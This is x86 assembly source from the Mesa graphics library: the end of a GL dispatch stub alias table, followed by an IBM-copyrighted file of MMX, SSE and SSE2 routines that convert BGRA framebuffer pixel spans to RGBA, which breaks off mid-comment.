GL_STUB_ALIAS(VertexAttrib4s, _gloffset_VertexAttrib4sARB, VertexAttrib4s@20, VertexAttrib4sARB, VertexAttrib4sARB@20)
GL_STUB_ALIAS(VertexAttrib4sv, _gloffset_VertexAttrib4svARB, VertexAttrib4sv@8, VertexAttrib4svARB, VertexAttrib4svARB@8)
GL_STUB_ALIAS(VertexAttrib4ubv, _gloffset_VertexAttrib4ubvARB, VertexAttrib4ubv@8, VertexAttrib4ubvARB, VertexAttrib4ubvARB@8)
GL_STUB_ALIAS(VertexAttrib4uiv, _gloffset_VertexAttrib4uivARB, VertexAttrib4uiv@8, VertexAttrib4uivARB, VertexAttrib4uivARB@8)
GL_STUB_ALIAS(VertexAttrib4usv, _gloffset_VertexAttrib4usvARB, VertexAttrib4usv@8, VertexAttrib4usvARB, VertexAttrib4usvARB@8)
GL_STUB_ALIAS(VertexAttribPointer, _gloffset_VertexAttribPointerARB, VertexAttribPointer@24, VertexAttribPointerARB, VertexAttribPointerARB@24)
GL_STUB_ALIAS(BindBuffer, _gloffset_BindBufferARB, BindBuffer@8, BindBufferARB, BindBufferARB@8)
GL_STUB_ALIAS(BufferData, _gloffset_BufferDataARB, BufferData@16, BufferDataARB, BufferDataARB@16)
GL_STUB_ALIAS(BufferSubData, _gloffset_BufferSubDataARB, BufferSubData@16, BufferSubDataARB, BufferSubDataARB@16)
GL_STUB_ALIAS(DeleteBuffers, _gloffset_DeleteBuffersARB, DeleteBuffers@8, DeleteBuffersARB, DeleteBuffersARB@8)
GL_STUB_ALIAS(GenBuffers, _gloffset_GenBuffersARB, GenBuffers@8, GenBuffersARB, GenBuffersARB@8)
GL_STUB_ALIAS(GetBufferParameteriv, _gloffset_GetBufferParameterivARB, GetBufferParameteriv@12, GetBufferParameterivARB, GetBufferParameterivARB@12)
GL_STUB_ALIAS(GetBufferPointerv, _gloffset_GetBufferPointervARB, GetBufferPointerv@12, GetBufferPointervARB, GetBufferPointervARB@12)
GL_STUB_ALIAS(GetBufferSubData, _gloffset_GetBufferSubDataARB, GetBufferSubData@16, GetBufferSubDataARB, GetBufferSubDataARB@16)
GL_STUB_ALIAS(IsBuffer, _gloffset_IsBufferARB, IsBuffer@4, IsBufferARB, IsBufferARB@4)
GL_STUB_ALIAS(MapBuffer, _gloffset_MapBufferARB, MapBuffer@8, MapBufferARB, MapBufferARB@8)
GL_STUB_ALIAS(UnmapBuffer, _gloffset_UnmapBufferARB, UnmapBuffer@4, UnmapBufferARB, UnmapBufferARB@4)
GL_STUB_ALIAS(BeginQuery, _gloffset_BeginQueryARB, BeginQuery@8, BeginQueryARB, BeginQueryARB@8)
GL_STUB_ALIAS(DeleteQueries, _gloffset_DeleteQueriesARB, DeleteQueries@8, DeleteQueriesARB, DeleteQueriesARB@8)
GL_STUB_ALIAS(EndQuery, _gloffset_EndQueryARB, EndQuery@4, EndQueryARB, EndQueryARB@4)
GL_STUB_ALIAS(GenQueries, _gloffset_GenQueriesARB, GenQueries@8, GenQueriesARB, GenQueriesARB@8)
GL_STUB_ALIAS(GetQueryObjectiv, _gloffset_GetQueryObjectivARB, GetQueryObjectiv@12, GetQueryObjectivARB, GetQueryObjectivARB@12)
GL_STUB_ALIAS(GetQueryObjectuiv, _gloffset_GetQueryObjectuivARB, GetQueryObjectuiv@12, GetQueryObjectuivARB, GetQueryObjectuivARB@12)
GL_STUB_ALIAS(GetQueryiv, _gloffset_GetQueryivARB, GetQueryiv@12, GetQueryivARB, GetQueryivARB@12)
GL_STUB_ALIAS(IsQuery, _gloffset_IsQueryARB, IsQuery@4, IsQueryARB, IsQueryARB@4)
GL_STUB_ALIAS(CompileShader, _gloffset_CompileShaderARB, CompileShader@4, CompileShaderARB, CompileShaderARB@4)
GL_STUB_ALIAS(GetActiveUniform, _gloffset_GetActiveUniformARB, GetActiveUniform@28, GetActiveUniformARB, GetActiveUniformARB@28)
GL_STUB_ALIAS(GetShaderSource, _gloffset_GetShaderSourceARB, GetShaderSource@16, GetShaderSourceARB, GetShaderSourceARB@16)
GL_STUB_ALIAS(GetUniformLocation, _gloffset_GetUniformLocationARB, GetUniformLocation@8, GetUniformLocationARB, GetUniformLocationARB@8)
GL_STUB_ALIAS(GetUniformfv, _gloffset_GetUniformfvARB, GetUniformfv@12, GetUniformfvARB, GetUniformfvARB@12)
GL_STUB_ALIAS(GetUniformiv, _gloffset_GetUniformivARB, GetUniformiv@12, GetUniformivARB, GetUniformivARB@12)
GL_STUB_ALIAS(LinkProgram, _gloffset_LinkProgramARB, LinkProgram@4, LinkProgramARB, LinkProgramARB@4)
GL_STUB_ALIAS(ShaderSource, _gloffset_ShaderSourceARB, ShaderSource@16, ShaderSourceARB, ShaderSourceARB@16)
GL_STUB_ALIAS(Uniform1f, _gloffset_Uniform1fARB, Uniform1f@8, Uniform1fARB, Uniform1fARB@8)
GL_STUB_ALIAS(Uniform1fv, _gloffset_Uniform1fvARB, Uniform1fv@12, Uniform1fvARB, Uniform1fvARB@12)
GL_STUB_ALIAS(Uniform1i, _gloffset_Uniform1iARB, Uniform1i@8, Uniform1iARB, Uniform1iARB@8)
GL_STUB_ALIAS(Uniform1iv, _gloffset_Uniform1ivARB, Uniform1iv@12, Uniform1ivARB, Uniform1ivARB@12)
GL_STUB_ALIAS(Uniform2f, _gloffset_Uniform2fARB, Uniform2f@12, Uniform2fARB, Uniform2fARB@12)
GL_STUB_ALIAS(Uniform2fv, _gloffset_Uniform2fvARB, Uniform2fv@12, Uniform2fvARB, Uniform2fvARB@12)
GL_STUB_ALIAS(Uniform2i, _gloffset_Uniform2iARB, Uniform2i@12, Uniform2iARB, Uniform2iARB@12)
GL_STUB_ALIAS(Uniform2iv, _gloffset_Uniform2ivARB, Uniform2iv@12, Uniform2ivARB, Uniform2ivARB@12)
GL_STUB_ALIAS(Uniform3f, _gloffset_Uniform3fARB, Uniform3f@16, Uniform3fARB, Uniform3fARB@16)
GL_STUB_ALIAS(Uniform3fv, _gloffset_Uniform3fvARB, Uniform3fv@12, Uniform3fvARB, Uniform3fvARB@12)
GL_STUB_ALIAS(Uniform3i, _gloffset_Uniform3iARB, Uniform3i@16, Uniform3iARB, Uniform3iARB@16)
GL_STUB_ALIAS(Uniform3iv, _gloffset_Uniform3ivARB, Uniform3iv@12, Uniform3ivARB, Uniform3ivARB@12)
GL_STUB_ALIAS(Uniform4f, _gloffset_Uniform4fARB, Uniform4f@20, Uniform4fARB, Uniform4fARB@20)
GL_STUB_ALIAS(Uniform4fv, _gloffset_Uniform4fvARB, Uniform4fv@12, Uniform4fvARB, Uniform4fvARB@12)
GL_STUB_ALIAS(Uniform4i, _gloffset_Uniform4iARB, Uniform4i@20, Uniform4iARB, Uniform4iARB@20)
GL_STUB_ALIAS(Uniform4iv, _gloffset_Uniform4ivARB, Uniform4iv@12, Uniform4ivARB, Uniform4ivARB@12)
GL_STUB_ALIAS(UniformMatrix2fv, _gloffset_UniformMatrix2fvARB, UniformMatrix2fv@16, UniformMatrix2fvARB, UniformMatrix2fvARB@16)
GL_STUB_ALIAS(UniformMatrix3fv, _gloffset_UniformMatrix3fvARB, UniformMatrix3fv@16, UniformMatrix3fvARB, UniformMatrix3fvARB@16)
GL_STUB_ALIAS(UniformMatrix4fv, _gloffset_UniformMatrix4fvARB, UniformMatrix4fv@16, UniformMatrix4fvARB, UniformMatrix4fvARB@16)
GL_STUB_ALIAS(UseProgram, _gloffset_UseProgramObjectARB, UseProgram@4, UseProgramObjectARB, UseProgramObjectARB@4)
GL_STUB_ALIAS(ValidateProgram, _gloffset_ValidateProgramARB, ValidateProgram@4, ValidateProgramARB, ValidateProgramARB@4)
GL_STUB_ALIAS(BindAttribLocation, _gloffset_BindAttribLocationARB, BindAttribLocation@12, BindAttribLocationARB, BindAttribLocationARB@12)
GL_STUB_ALIAS(GetActiveAttrib, _gloffset_GetActiveAttribARB, GetActiveAttrib@28, GetActiveAttribARB, GetActiveAttribARB@28)
GL_STUB_ALIAS(GetAttribLocation, _gloffset_GetAttribLocationARB, GetAttribLocation@8, GetAttribLocationARB, GetAttribLocationARB@8)
GL_STUB_ALIAS(DrawBuffers, _gloffset_DrawBuffersARB, DrawBuffers@8, DrawBuffersARB, DrawBuffersARB@8)
GL_STUB_ALIAS(DrawBuffersATI, _gloffset_DrawBuffersARB, DrawBuffersATI@8, DrawBuffersARB, DrawBuffersARB@8)
GL_STUB_ALIAS(PointParameterf, _gloffset_PointParameterfEXT, PointParameterf@8, PointParameterfEXT, PointParameterfEXT@8)
GL_STUB_ALIAS(PointParameterfARB, _gloffset_PointParameterfEXT, PointParameterfARB@8, PointParameterfEXT, PointParameterfEXT@8)
GL_STUB_ALIAS(PointParameterfSGIS, _gloffset_PointParameterfEXT, PointParameterfSGIS@8, PointParameterfEXT, PointParameterfEXT@8)
GL_STUB_ALIAS(PointParameterfv, _gloffset_PointParameterfvEXT, PointParameterfv@8, PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB_ALIAS(PointParameterfvARB, _gloffset_PointParameterfvEXT, PointParameterfvARB@8, PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB_ALIAS(PointParameterfvSGIS, _gloffset_PointParameterfvEXT, PointParameterfvSGIS@8, PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB_ALIAS(SecondaryColor3b, _gloffset_SecondaryColor3bEXT, SecondaryColor3b@12, SecondaryColor3bEXT, SecondaryColor3bEXT@12)
GL_STUB_ALIAS(SecondaryColor3bv, _gloffset_SecondaryColor3bvEXT, SecondaryColor3bv@4, SecondaryColor3bvEXT, SecondaryColor3bvEXT@4)
GL_STUB_ALIAS(SecondaryColor3d, _gloffset_SecondaryColor3dEXT, SecondaryColor3d@24, SecondaryColor3dEXT, SecondaryColor3dEXT@24)
GL_STUB_ALIAS(SecondaryColor3dv, _gloffset_SecondaryColor3dvEXT, SecondaryColor3dv@4, SecondaryColor3dvEXT, SecondaryColor3dvEXT@4)
GL_STUB_ALIAS(SecondaryColor3f, _gloffset_SecondaryColor3fEXT, SecondaryColor3f@12, SecondaryColor3fEXT, SecondaryColor3fEXT@12)
GL_STUB_ALIAS(SecondaryColor3fv, _gloffset_SecondaryColor3fvEXT, SecondaryColor3fv@4, SecondaryColor3fvEXT, SecondaryColor3fvEXT@4)
GL_STUB_ALIAS(SecondaryColor3i, _gloffset_SecondaryColor3iEXT, SecondaryColor3i@12, SecondaryColor3iEXT, SecondaryColor3iEXT@12)
GL_STUB_ALIAS(SecondaryColor3iv, _gloffset_SecondaryColor3ivEXT, SecondaryColor3iv@4, SecondaryColor3ivEXT, SecondaryColor3ivEXT@4)
GL_STUB_ALIAS(SecondaryColor3s, _gloffset_SecondaryColor3sEXT, SecondaryColor3s@12, SecondaryColor3sEXT, SecondaryColor3sEXT@12)
GL_STUB_ALIAS(SecondaryColor3sv, _gloffset_SecondaryColor3svEXT, SecondaryColor3sv@4, SecondaryColor3svEXT, SecondaryColor3svEXT@4)
GL_STUB_ALIAS(SecondaryColor3ub, _gloffset_SecondaryColor3ubEXT, SecondaryColor3ub@12, SecondaryColor3ubEXT, SecondaryColor3ubEXT@12)
GL_STUB_ALIAS(SecondaryColor3ubv, _gloffset_SecondaryColor3ubvEXT, SecondaryColor3ubv@4, SecondaryColor3ubvEXT, SecondaryColor3ubvEXT@4)
GL_STUB_ALIAS(SecondaryColor3ui, _gloffset_SecondaryColor3uiEXT, SecondaryColor3ui@12, SecondaryColor3uiEXT, SecondaryColor3uiEXT@12)
GL_STUB_ALIAS(SecondaryColor3uiv, _gloffset_SecondaryColor3uivEXT, SecondaryColor3uiv@4, SecondaryColor3uivEXT, SecondaryColor3uivEXT@4)
GL_STUB_ALIAS(SecondaryColor3us, _gloffset_SecondaryColor3usEXT, SecondaryColor3us@12, SecondaryColor3usEXT, SecondaryColor3usEXT@12)
GL_STUB_ALIAS(SecondaryColor3usv, _gloffset_SecondaryColor3usvEXT, SecondaryColor3usv@4, SecondaryColor3usvEXT, SecondaryColor3usvEXT@4)
GL_STUB_ALIAS(SecondaryColorPointer, _gloffset_SecondaryColorPointerEXT, SecondaryColorPointer@16, SecondaryColorPointerEXT, SecondaryColorPointerEXT@16)
GL_STUB_ALIAS(MultiDrawArrays, _gloffset_MultiDrawArraysEXT, MultiDrawArrays@16, MultiDrawArraysEXT, MultiDrawArraysEXT@16)
GL_STUB_ALIAS(MultiDrawElements, _gloffset_MultiDrawElementsEXT, MultiDrawElements@20, MultiDrawElementsEXT, MultiDrawElementsEXT@20)
GL_STUB_ALIAS(FogCoordPointer, _gloffset_FogCoordPointerEXT, FogCoordPointer@12, FogCoordPointerEXT, FogCoordPointerEXT@12)
GL_STUB_ALIAS(FogCoordd, _gloffset_FogCoorddEXT, FogCoordd@8, FogCoorddEXT, FogCoorddEXT@8)
GL_STUB_ALIAS(FogCoorddv, _gloffset_FogCoorddvEXT, FogCoorddv@4, FogCoorddvEXT, FogCoorddvEXT@4)
GL_STUB_ALIAS(FogCoordf, _gloffset_FogCoordfEXT, FogCoordf@4, FogCoordfEXT, FogCoordfEXT@4)
GL_STUB_ALIAS(FogCoordfv, _gloffset_FogCoordfvEXT, FogCoordfv@4, FogCoordfvEXT, FogCoordfvEXT@4)
GL_STUB_ALIAS(BlendFuncSeparate, _gloffset_BlendFuncSeparateEXT, BlendFuncSeparate@16, BlendFuncSeparateEXT, BlendFuncSeparateEXT@16)
GL_STUB_ALIAS(BlendFuncSeparateINGR, _gloffset_BlendFuncSeparateEXT, BlendFuncSeparateINGR@16, BlendFuncSeparateEXT, BlendFuncSeparateEXT@16)
GL_STUB_ALIAS(WindowPos2d, _gloffset_WindowPos2dMESA, WindowPos2d@16, WindowPos2dMESA, WindowPos2dMESA@16)
GL_STUB_ALIAS(WindowPos2dARB, _gloffset_WindowPos2dMESA, WindowPos2dARB@16, WindowPos2dMESA, WindowPos2dMESA@16)
GL_STUB_ALIAS(WindowPos2dv, _gloffset_WindowPos2dvMESA, WindowPos2dv@4, WindowPos2dvMESA, WindowPos2dvMESA@4)
GL_STUB_ALIAS(WindowPos2dvARB, _gloffset_WindowPos2dvMESA, WindowPos2dvARB@4, WindowPos2dvMESA, WindowPos2dvMESA@4)
GL_STUB_ALIAS(WindowPos2f, _gloffset_WindowPos2fMESA, WindowPos2f@8, WindowPos2fMESA, WindowPos2fMESA@8)
GL_STUB_ALIAS(WindowPos2fARB, _gloffset_WindowPos2fMESA, WindowPos2fARB@8, WindowPos2fMESA, WindowPos2fMESA@8)
GL_STUB_ALIAS(WindowPos2fv, _gloffset_WindowPos2fvMESA, WindowPos2fv@4, WindowPos2fvMESA, WindowPos2fvMESA@4)
GL_STUB_ALIAS(WindowPos2fvARB, _gloffset_WindowPos2fvMESA, WindowPos2fvARB@4, WindowPos2fvMESA, WindowPos2fvMESA@4)
GL_STUB_ALIAS(WindowPos2i, _gloffset_WindowPos2iMESA, WindowPos2i@8, WindowPos2iMESA, WindowPos2iMESA@8)
GL_STUB_ALIAS(WindowPos2iARB, _gloffset_WindowPos2iMESA, WindowPos2iARB@8, WindowPos2iMESA, WindowPos2iMESA@8)
GL_STUB_ALIAS(WindowPos2iv, _gloffset_WindowPos2ivMESA, WindowPos2iv@4, WindowPos2ivMESA, WindowPos2ivMESA@4)
GL_STUB_ALIAS(WindowPos2ivARB, _gloffset_WindowPos2ivMESA, WindowPos2ivARB@4, WindowPos2ivMESA, WindowPos2ivMESA@4)
GL_STUB_ALIAS(WindowPos2s, _gloffset_WindowPos2sMESA, WindowPos2s@8, WindowPos2sMESA, WindowPos2sMESA@8)
GL_STUB_ALIAS(WindowPos2sARB, _gloffset_WindowPos2sMESA, WindowPos2sARB@8, WindowPos2sMESA, WindowPos2sMESA@8)
GL_STUB_ALIAS(WindowPos2sv, _gloffset_WindowPos2svMESA, WindowPos2sv@4, WindowPos2svMESA, WindowPos2svMESA@4)
GL_STUB_ALIAS(WindowPos2svARB, _gloffset_WindowPos2svMESA, WindowPos2svARB@4, WindowPos2svMESA, WindowPos2svMESA@4)
GL_STUB_ALIAS(WindowPos3d, _gloffset_WindowPos3dMESA, WindowPos3d@24, WindowPos3dMESA, WindowPos3dMESA@24)
GL_STUB_ALIAS(WindowPos3dARB, _gloffset_WindowPos3dMESA, WindowPos3dARB@24, WindowPos3dMESA, WindowPos3dMESA@24)
GL_STUB_ALIAS(WindowPos3dv, _gloffset_WindowPos3dvMESA, WindowPos3dv@4, WindowPos3dvMESA, WindowPos3dvMESA@4)
GL_STUB_ALIAS(WindowPos3dvARB, _gloffset_WindowPos3dvMESA, WindowPos3dvARB@4, WindowPos3dvMESA, WindowPos3dvMESA@4)
GL_STUB_ALIAS(WindowPos3f, _gloffset_WindowPos3fMESA, WindowPos3f@12, WindowPos3fMESA, WindowPos3fMESA@12)
GL_STUB_ALIAS(WindowPos3fARB, _gloffset_WindowPos3fMESA, WindowPos3fARB@12, WindowPos3fMESA, WindowPos3fMESA@12)
GL_STUB_ALIAS(WindowPos3fv, _gloffset_WindowPos3fvMESA, WindowPos3fv@4, WindowPos3fvMESA, WindowPos3fvMESA@4)
GL_STUB_ALIAS(WindowPos3fvARB, _gloffset_WindowPos3fvMESA, WindowPos3fvARB@4, WindowPos3fvMESA, WindowPos3fvMESA@4)
GL_STUB_ALIAS(WindowPos3i, _gloffset_WindowPos3iMESA, WindowPos3i@12, WindowPos3iMESA, WindowPos3iMESA@12)
GL_STUB_ALIAS(WindowPos3iARB, _gloffset_WindowPos3iMESA, WindowPos3iARB@12, WindowPos3iMESA, WindowPos3iMESA@12)
GL_STUB_ALIAS(WindowPos3iv, _gloffset_WindowPos3ivMESA, WindowPos3iv@4, WindowPos3ivMESA, WindowPos3ivMESA@4)
GL_STUB_ALIAS(WindowPos3ivARB, _gloffset_WindowPos3ivMESA, WindowPos3ivARB@4, WindowPos3ivMESA, WindowPos3ivMESA@4)
GL_STUB_ALIAS(WindowPos3s, _gloffset_WindowPos3sMESA, WindowPos3s@12, WindowPos3sMESA, WindowPos3sMESA@12)
GL_STUB_ALIAS(WindowPos3sARB, _gloffset_WindowPos3sMESA, WindowPos3sARB@12, WindowPos3sMESA, WindowPos3sMESA@12)
GL_STUB_ALIAS(WindowPos3sv, _gloffset_WindowPos3svMESA, WindowPos3sv@4, WindowPos3svMESA, WindowPos3svMESA@4)
GL_STUB_ALIAS(WindowPos3svARB, _gloffset_WindowPos3svMESA, WindowPos3svARB@4, WindowPos3svMESA, WindowPos3svMESA@4)
GL_STUB_ALIAS(BindProgramARB, _gloffset_BindProgramNV, BindProgramARB@8, BindProgramNV, BindProgramNV@8)
GL_STUB_ALIAS(DeleteProgramsARB, _gloffset_DeleteProgramsNV, DeleteProgramsARB@8, DeleteProgramsNV, DeleteProgramsNV@8)
GL_STUB_ALIAS(GenProgramsARB, _gloffset_GenProgramsNV, GenProgramsARB@8, GenProgramsNV, GenProgramsNV@8)
GL_STUB_ALIAS(GetVertexAttribPointerv, _gloffset_GetVertexAttribPointervNV, GetVertexAttribPointerv@12, GetVertexAttribPointervNV, GetVertexAttribPointervNV@12)
GL_STUB_ALIAS(GetVertexAttribPointervARB, _gloffset_GetVertexAttribPointervNV, GetVertexAttribPointervARB@12, GetVertexAttribPointervNV, GetVertexAttribPointervNV@12)
GL_STUB_ALIAS(IsProgramARB, _gloffset_IsProgramNV, IsProgramARB@4, IsProgramNV, IsProgramNV@4)
GL_STUB_ALIAS(PointParameteri, _gloffset_PointParameteriNV, PointParameteri@8, PointParameteriNV, PointParameteriNV@8)
GL_STUB_ALIAS(PointParameteriv, _gloffset_PointParameterivNV, PointParameteriv@8, PointParameterivNV, PointParameterivNV@8)
GLOBL GLNAME(gl_dispatch_functions_end)
HIDDEN(GLNAME(gl_dispatch_functions_end))
ALIGNTEXT16
GLNAME(gl_dispatch_functions_end):
#if defined(GLX_USE_TLS) && defined(__linux__)
.section ".note.ABI-tag", "a"
.p2align 2
.long 1f - 0f /* name length */
.long 3f - 2f /* data length */
.long 1 /* note length */
0: .asciz "GNU" /* vendor name */
1: .p2align 2
2: .long 0 /* note data: the ABI tag */
.long 2,4,20 /* Minimum kernel version w/TLS */
3: .p2align 2 /* pad out section */
#endif /* GLX_USE_TLS */
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,228
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/read_rgba_span_x86.S
|
/*
* (C) Copyright IBM Corporation 2004
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* on the rights to use, copy, modify, merge, publish, distribute, sub
* license, and/or sell copies of the Software, and to permit persons to whom
* the Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* IBM AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM,
* DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
* OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
* USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/**
* \file read_rgba_span_x86.S
* Optimized routines to transfer pixel data from the framebuffer to a
* buffer in main memory.
*
* \author Ian Romanick <idr@us.ibm.com>
*/
.file "read_rgba_span_x86.S"
#if !defined(__DJGPP__) && !defined(__MINGW32__) /* this one cries for assyntax.h */
/* Kevin F. Quinn 2nd July 2006
* Replaced data segment constants with text-segment instructions.
*/
#define LOAD_MASK(mvins,m1,m2) \
pushl $0xff00ff00 ;\
pushl $0xff00ff00 ;\
pushl $0xff00ff00 ;\
pushl $0xff00ff00 ;\
mvins (%esp), m1 ;\
pushl $0x00ff0000 ;\
pushl $0x00ff0000 ;\
pushl $0x00ff0000 ;\
pushl $0x00ff0000 ;\
mvins (%esp), m2 ;\
addl $32, %esp
/* I implemented these as macros because they appear in several places,
* and I've tweaked them a number of times. I got tired of changing every
* place they appear. :)
*/
#define DO_ONE_PIXEL() \
movl (%ebx), %eax ; \
addl $4, %ebx ; \
bswap %eax /* ARGB -> BGRA */ ; \
rorl $8, %eax /* BGRA -> ABGR */ ; \
movl %eax, (%ecx) /* ABGR -> R, G, B, A */ ; \
addl $4, %ecx
#define DO_ONE_LAST_PIXEL() \
movl (%ebx), %eax ; \
bswap %eax /* ARGB -> BGRA */ ; \
rorl $8, %eax /* BGRA -> ABGR */ ; \
movl %eax, (%ecx) /* ABGR -> R, G, B, A */ ; \
/**
* MMX optimized version of the BGRA8888_REV to RGBA copy routine.
*
* \warning
* This function assumes that the caller will issue the EMMS instruction
* at the correct places.
*/
.globl _generic_read_RGBA_span_BGRA8888_REV_MMX
.hidden _generic_read_RGBA_span_BGRA8888_REV_MMX
.type _generic_read_RGBA_span_BGRA8888_REV_MMX, @function
_generic_read_RGBA_span_BGRA8888_REV_MMX:
pushl %ebx
#ifdef USE_INNER_EMMS
emms
#endif
LOAD_MASK(movq,%mm1,%mm2)
movl 8(%esp), %ebx /* source pointer */
movl 16(%esp), %edx /* number of pixels to copy */
movl 12(%esp), %ecx /* destination pointer */
testl %edx, %edx
jle .L20 /* Bail if there's nothing to do. */
movl %ebx, %eax
negl %eax
sarl $2, %eax
andl $1, %eax
je .L17
subl %eax, %edx
DO_ONE_PIXEL()
.L17:
/* Would it be faster to unroll this loop once and process 4 pixels
* per pass, instead of just two?
*/
movl %edx, %eax
shrl %eax
jmp .L18
.L19:
movq (%ebx), %mm0
addl $8, %ebx
/* These 9 instructions do what PSHUFB (if there were such an
* instruction) could do in 1. :(
*/
movq %mm0, %mm3
movq %mm0, %mm4
pand %mm2, %mm3
psllq $16, %mm4
psrlq $16, %mm3
pand %mm2, %mm4
pand %mm1, %mm0
por %mm4, %mm3
por %mm3, %mm0
movq %mm0, (%ecx)
addl $8, %ecx
subl $1, %eax
.L18:
jne .L19
#ifdef USE_INNER_EMMS
emms
#endif
/* At this point there are either 1 or 0 pixels remaining to be
* converted. Convert the last pixel, if needed.
*/
testl $1, %edx
je .L20
DO_ONE_LAST_PIXEL()
.L20:
popl %ebx
ret
.size _generic_read_RGBA_span_BGRA8888_REV_MMX, .-_generic_read_RGBA_span_BGRA8888_REV_MMX
/**
* SSE optimized version of the BGRA8888_REV to RGBA copy routine. SSE
* instructions are only actually used to read data from the framebuffer.
* In practice, the speed-up is pretty small.
*
* \todo
* Do some more testing and determine if there's any reason to have this
* function in addition to the MMX version.
*
* \warning
* This function assumes that the caller will issue the EMMS instruction
* at the correct places.
*/
.globl _generic_read_RGBA_span_BGRA8888_REV_SSE
.hidden _generic_read_RGBA_span_BGRA8888_REV_SSE
.type _generic_read_RGBA_span_BGRA8888_REV_SSE, @function
_generic_read_RGBA_span_BGRA8888_REV_SSE:
pushl %esi
pushl %ebx
pushl %ebp
#ifdef USE_INNER_EMMS
emms
#endif
LOAD_MASK(movq,%mm1,%mm2)
movl 16(%esp), %ebx /* source pointer */
movl 24(%esp), %edx /* number of pixels to copy */
movl 20(%esp), %ecx /* destination pointer */
testl %edx, %edx
jle .L35 /* Bail if there's nothing to do. */
movl %esp, %ebp
subl $16, %esp
andl $0xfffffff0, %esp
movl %ebx, %eax
movl %edx, %esi
negl %eax
andl $15, %eax
sarl $2, %eax
cmpl %edx, %eax
cmovle %eax, %esi
subl %esi, %edx
testl $1, %esi
je .L32
DO_ONE_PIXEL()
.L32:
testl $2, %esi
je .L31
movq (%ebx), %mm0
addl $8, %ebx
movq %mm0, %mm3
movq %mm0, %mm4
pand %mm2, %mm3
psllq $16, %mm4
psrlq $16, %mm3
pand %mm2, %mm4
pand %mm1, %mm0
por %mm4, %mm3
por %mm3, %mm0
movq %mm0, (%ecx)
addl $8, %ecx
.L31:
movl %edx, %eax
shrl $2, %eax
jmp .L33
.L34:
movaps (%ebx), %xmm0
addl $16, %ebx
/* This would be so much better if we could just move directly from
* an SSE register to an MMX register. Unfortunately, that
* functionality wasn't introduced until SSE2 with the MOVDQ2Q
* instruction.
*/
movaps %xmm0, (%esp)
movq (%esp), %mm0
movq 8(%esp), %mm5
movq %mm0, %mm3
movq %mm0, %mm4
movq %mm5, %mm6
movq %mm5, %mm7
pand %mm2, %mm3
pand %mm2, %mm6
psllq $16, %mm4
psllq $16, %mm7
psrlq $16, %mm3
psrlq $16, %mm6
pand %mm2, %mm4
pand %mm2, %mm7
pand %mm1, %mm0
pand %mm1, %mm5
por %mm4, %mm3
por %mm7, %mm6
por %mm3, %mm0
por %mm6, %mm5
movq %mm0, (%ecx)
movq %mm5, 8(%ecx)
addl $16, %ecx
subl $1, %eax
.L33:
jne .L34
#ifdef USE_INNER_EMMS
emms
#endif
movl %ebp, %esp
/* At this point there are either [0, 3] pixels remaining to be
* converted.
*/
testl $2, %edx
je .L36
movq (%ebx), %mm0
addl $8, %ebx
movq %mm0, %mm3
movq %mm0, %mm4
pand %mm2, %mm3
psllq $16, %mm4
psrlq $16, %mm3
pand %mm2, %mm4
pand %mm1, %mm0
por %mm4, %mm3
por %mm3, %mm0
movq %mm0, (%ecx)
addl $8, %ecx
.L36:
testl $1, %edx
je .L35
DO_ONE_LAST_PIXEL()
.L35:
popl %ebp
popl %ebx
popl %esi
ret
.size _generic_read_RGBA_span_BGRA8888_REV_SSE, .-_generic_read_RGBA_span_BGRA8888_REV_SSE
/**
* SSE2 optimized version of the BGRA8888_REV to RGBA copy routine.
*/
.text
.globl _generic_read_RGBA_span_BGRA8888_REV_SSE2
.hidden _generic_read_RGBA_span_BGRA8888_REV_SSE2
.type _generic_read_RGBA_span_BGRA8888_REV_SSE2, @function
_generic_read_RGBA_span_BGRA8888_REV_SSE2:
pushl %esi
pushl %ebx
LOAD_MASK(movdqu,%xmm1,%xmm2)
movl 12(%esp), %ebx /* source pointer */
movl 20(%esp), %edx /* number of pixels to copy */
movl 16(%esp), %ecx /* destination pointer */
movl %ebx, %eax
movl %edx, %esi
testl %edx, %edx
jle .L46 /* Bail if there's nothing to do. */
/* If the source pointer isn't a multiple of 16 we have to process
* a few pixels the "slow" way to get the address aligned for
* the SSE fetch intsructions.
*/
negl %eax
andl $15, %eax
sarl $2, %eax
cmpl %edx, %eax
cmovbe %eax, %esi
subl %esi, %edx
testl $1, %esi
je .L41
DO_ONE_PIXEL()
.L41:
testl $2, %esi
je .L40
movq (%ebx), %xmm0
addl $8, %ebx
movdqa %xmm0, %xmm3
movdqa %xmm0, %xmm4
andps %xmm1, %xmm0
andps %xmm2, %xmm3
pslldq $2, %xmm4
psrldq $2, %xmm3
andps %xmm2, %xmm4
orps %xmm4, %xmm3
orps %xmm3, %xmm0
movq %xmm0, (%ecx)
addl $8, %ecx
.L40:
/* Would it be worth having a specialized version of this loop for
* the case where the destination is 16-byte aligned? That version
* would be identical except that it could use movedqa instead of
* movdqu.
*/
movl %edx, %eax
shrl $2, %eax
jmp .L42
.L43:
movdqa (%ebx), %xmm0
addl $16, %ebx
movdqa %xmm0, %xmm3
movdqa %xmm0, %xmm4
andps %xmm1, %xmm0
andps %xmm2, %xmm3
pslldq $2, %xmm4
psrldq $2, %xmm3
andps %xmm2, %xmm4
orps %xmm4, %xmm3
orps %xmm3, %xmm0
movdqu %xmm0, (%ecx)
addl $16, %ecx
subl $1, %eax
.L42:
jne .L43
/* There may be upto 3 pixels remaining to be copied. Take care
